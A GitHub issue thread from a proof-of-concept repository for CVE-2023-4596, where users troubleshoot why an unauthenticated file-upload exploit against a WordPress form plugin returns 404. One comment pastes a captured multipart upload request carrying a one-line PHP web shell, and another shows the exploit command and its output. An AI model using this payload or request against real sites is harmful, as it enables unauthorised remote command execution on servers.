search

E1A / CVE-2023-4596

PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.
26 stars 5 forks source link

Not working on WIndows #3

Closed PunitTailor55 closed 1 year ago

PunitTailor55 commented 1 year ago

I am trying the given exploit but it is not working on windows.

[+] Sending payload to target
<Response [200]>
[+] Successful file upload!

Uploaded File Location: http://127.0.0.1:8000/wp-content/uploads/2023/09/elsRmvexqL.php

[+] Sending request to uploaded file...
<Response [404]>
[-] Server returned an unexpected response: 404

It is showing file upload successfully but it's giving 404.

E1A commented 1 year ago

Hi there!

Could you check the following things:

Thanks

PunitTailor55 commented 1 year ago

I have a vulnerable version [+] Vulnerable version found: 1.24.6 There is no file in /upload folder.

I have captured the following request in Burp and used your exploit. 

------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="postdata-1-post-image"; filename="elsRmvexqL.php"
Content-Type: application/octet-stream

<?php
$_GET['function']($_GET['cmd']);
?>
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="forminator_nonce"

68e7cad1fc
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="_wp_http_referer"

/?page_id=7
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="form_id"

6
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="current_url"

http://127.0.0.1:8000/?page_id=7
------WebKitFormBoundarytsSnyRY1FWmgGHpA
Content-Disposition: form-data; name="action"

forminator_submit_form_custom-forms

In the exploit, the file uploads successfully but no file is created.

E1A commented 1 year ago

Looks indeed that you're using postdata

Just tested it again on the latest windows wp and my file was successfully uploaded but got an 404 but since I installed WordPress in the /wordpress directory. The script only looks for \wp-content\uploads\2023\09\file.php, and it could not locate it. Could this also be the issue for you? Defender was also blocking the file, so that could also be an issue

When installing on xampp, my file location is: C:\xampp\htdocs\wordpress\wp-content\uploads\2023\09 what service are you using and what is yours?

PunitTailor55 commented 1 year ago

I am using docker and the file location is /wp-content/uploads/2023/09/adsad.php. I have disabled the firewall but still the issue is there.

E1A commented 1 year ago

Really weird, not sure what could be the issue. Would you be open to calling via discord to find the problem?

E1A commented 1 year ago

ping

forme9 commented 12 months ago

Hi, I also have the same problem, how can I solve it?

E1A commented 12 months ago

Hi!

Could you check the following things:

Thanks

forme9 commented 12 months ago

Hi ! 121 Using -v to check the version is vulnerable. I can find "forminator-field-post-image-postdata" in the source code page. I used docker and generated the path (wp-content/uploads/2023/11/NrIaoXkWLS.php) but could not generate the final .php file

Thanks for the help

E1A commented 12 months ago

Can you paste the command you used and the output that you received?

forme9 commented 12 months ago

sure! This is the command entered:python exploit.py -u http://127.0.0.1/?p=38 -r This url can normally access the post form page.

output:

[+] Sending payload to target [+] Successful file upload!

Uploaded File Location: http://127.0.0.1/wp-content/uploads/2023/11/ZPowyMwZur.php

[+] Sending request to uploaded file... [-] Server returned an unexpected response: 404

The path is normal and 2023/11 is generated in wp-content/uploads, but the "ZPowyMwZur.php" file is not generated. There is no content under the file path 11

E1A commented 11 months ago

Could you try it with python3?

forme9 commented 11 months ago

yes, I 'm using python3.11